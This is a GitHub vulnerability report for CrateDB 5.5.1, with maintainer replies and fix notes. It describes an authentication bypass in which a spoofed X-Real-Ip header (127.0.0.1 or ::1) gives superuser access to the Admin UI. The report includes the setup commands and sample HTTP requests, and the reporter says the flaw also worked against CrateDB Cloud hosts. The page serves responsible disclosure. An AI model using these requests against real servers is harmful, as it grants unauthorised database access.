There is an HTTP authentication bypass vulnerability in the CrateDB database #15231
Comments
|
Thank you for bringing this issue to our attention. We are currently looking into it with urgency. As a preliminary measure, it's advisable to restrict superuser access to the PostgreSQL protocol. Additionally, it is highly recommended for CrateDB Cloud Clusters to use the IP Allow-List feature, effectively blocking access at the TCP level. Which can be found in the Cluster > Manage Tab |
It can be enabled by a newly introduced node setting. If if enabled, it will be ignored if matching any _local_ address. Relates to #15231.
It can be enabled by a newly introduced node setting. If if enabled, it will be ignored if matching any _local_ address. Relates to #15231.
It can be enabled by a newly introduced node setting. If if enabled, it will be ignored if matching any _local_ address. Relates to #15231.
|
@Tu0Laj1 On CrateDB Cloud, the team took already the necessary actions to mitigate it for all existing clusters, and is working on further improvements to avoid such security risks in the future. |
|
We have just released CrateDB |
CrateDB version
5.5.1
CrateDB setup information
number of nodes: 1.
Docker Installed.
Install startup command:
docker pull crate:latest
docker run -d --publish 4200:4200 --publish 5432:5432 crate -Cdiscovery.type=single-node -Cauth.host_based.enabled=true -Cauth.host_based.config.0.method=trust -Cauth.host_based.config.0.address=local -Cauth.host_based.config.0.user=crate -Cauth.host_based.config.99.method=password
Problem description
There is an authentication bypass vulnerability in the Admin UI component of the CrateDB database. After configuring password authentication and_ Local_ In the case of an address, identity authentication can be bypassed by setting the X-Real IP request header to a specific value and accessing the Admin UI directly using the default user identity.
Steps to Reproduce
1.start the Docker container of the CrateDB database
docker pull crate:latest
docker run -d --publish 4200:4200 --publish 5432:5432 crate -Cdiscovery.type=single-node -Cauth.host_based.enabled=true -Cauth.host_based.config.0.method=trust -Cauth.host_based.config.0.address=local -Cauth.host_based.config.0.user=crate -Cauth.host_based.config.99.method=password
2.Accessing the CrateDB Admin UI
http://yourip:4200/
At this point, the identity authentication window will prompt you to enter your username and password,due to the default user "crate" not having a password, it is not possible to log in to the Admin UI using the username "crate".
3.Code Audit
In the code file: \crate-master\server\src\main\java\io\crate\auth\HostBasedAuthentication.java,defined that when hbaAddressOrHostname. equals ("local"), it can be accessed through the IP address "127.0.0.1" or ":: 1"
4.Bypass identity authentication by setting the X-Real IP request header to "127.0.0.1" or ":: 1"
Request package display, for example:
POST /_sql HTTP/1.1
Host: yourip:4200
Content-Type: application/json;charset=utf-8
X-Real-Ip: 127.0.0.1
Content-Length: 31
{"stmt":"SELECT CURRENT_USER;"}
or
POST /_sql HTTP/1.1
Host: yourip:4200
Content-Type: application/json;charset=utf-8
X-Real-Ip: ::1
Content-Length: 31
{"stmt":"SELECT CURRENT_USER;"}
5.Even worse, https://console.cratedb.cloud/ Also affected by this vulnerability
I can directly access the CrateDB Admin UI on https://*.cratedb.net:4200/as the "crate" super user through this vulnerability. Normally, I should only have the user privileges of "admin"
Actual Result
Directly access the CrateDB Admin UI as the default user
Expected Result
Directly access the CrateDB Admin UI as the default user
The text was updated successfully, but these errors were encountered: